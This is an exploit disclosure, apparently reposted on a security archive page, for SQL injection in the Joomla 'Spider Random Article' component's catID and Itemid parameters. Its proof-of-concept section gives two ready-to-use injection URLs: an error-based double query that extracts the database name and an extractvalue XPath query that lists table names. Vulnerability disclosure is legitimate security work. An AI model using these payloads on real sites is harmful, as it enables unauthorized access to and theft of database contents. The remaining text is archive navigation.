Joomla Spider Random Article SQL Injection

Joomla Spider Random Article SQL Injection: Posted Mar 25, 2015; Authored by Jagriti Sahu; Joomla Spider Random Article component suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | fa08b153d4be75c3ef3dc85593c751b07ba4907dd1c8090e641c63c957325b65; Download | Favorite | View

Joomla Spider Random Article SQL Injection

##################################################################################################
#Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability
#Author        : Jagriti Sahu AKA Incredible
#Vendor Link   : http://demo.web-dorado.com/spider-random-article.html
#Date          : 22/03/2015
#Discovered at : IndiShell Lab
#Love to       : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################

////////////////////////
/// Overview:
////////////////////////


joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters
and hence affected by SQL injection vulnerability 

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to catID and Itemid parameter 


////////////////
///  POC   ////
///////////////


SQL Injection in catID parameter
=================================

Use error based double query injection with catID parameter

Injected Link--->

http://demo.web-dorado.com

Like error based double query injection for exploiting username --->
http://demo.web-dorado.com/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13 

POC Image URL--->
http://tinypic.com/view.php?pic=iz9aiu&s=8#.VRG9duESHIU




SQL Injection in Itemid parameter
=================================

Itemid Parameter is exploitable using xpath injection
 
http://demo.web-dorado.com/index.php?option=com_rand&catID=1&limit=1&style=1&view=articles&format=raw&Itemid=13'and extractvalue(6678,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -

POC Image URL--->
http://tinypic.com/view.php?pic=1239z5h&s=8#.VRG97OESHIU


###################################################################################################


           --==[[Special Thanks to]]==--

                #  Manish Kishan Tanwar  ^_^ #

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Joomla Spider Random Article SQL Injection

Joomla Spider Random Article SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Spider Random Article SQL Injection

Share This

Joomla Spider Random Article SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems